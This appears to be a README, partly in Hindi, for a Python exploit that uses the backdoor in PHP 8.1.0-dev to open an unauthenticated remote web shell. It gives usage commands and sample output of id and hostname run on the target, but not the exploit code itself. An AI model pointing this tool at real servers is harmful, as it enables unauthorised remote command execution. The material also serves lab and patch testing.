
PHP 8.1.0-dev WebShell Remote Code Execution
PHP 8.1.0-dev WebShell RCE (Unauthenticated) के लिए एक्सप्लॉइट कोड
अपेक्षित परिणाम: PHP 8.1.0-dev सर्वर पर स्थापित बैकडोर का शोषण करना और इस प्रकार दूरस्थ रूप से कमांड निष्पादित करने हेतु WebShell प्राप्त करना।
केवल शैक्षिक उद्देश्यों तथा कॉर्पोरेट वातावरण में परीक्षण के लिए अभिप्रेत है।
यह एक्सप्लॉइट Python 3.8.6 पर परीक्षण किया गया था
cfx: ~/Documents/
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL]
PHP 8.1.0-dev WebShell RCE by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)
Exploit Usage :
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami
यह एक्सप्लॉइट प्रारंभ में चलाने के लिए एकल तर्क की अपेक्षा करता है :
cfx: ~/Documents/
→ ./exploit.py -l http://127.0.0.1
[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX
Target is running on PHP 8.1.0-dev
*Shoot your commands below*
[^] WebShell=- id
uid=1000(cfx) gid=1000(cfx) groups=1000(cfx)
[^] WebShell=- hostname
shockwave
[^] WebShell=- ^C
Exiting.
cfx: ~/Documents/
→ ./exploit.py -l http://127.0.0.1
[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX
Invalid URL or Target Not Vulnerable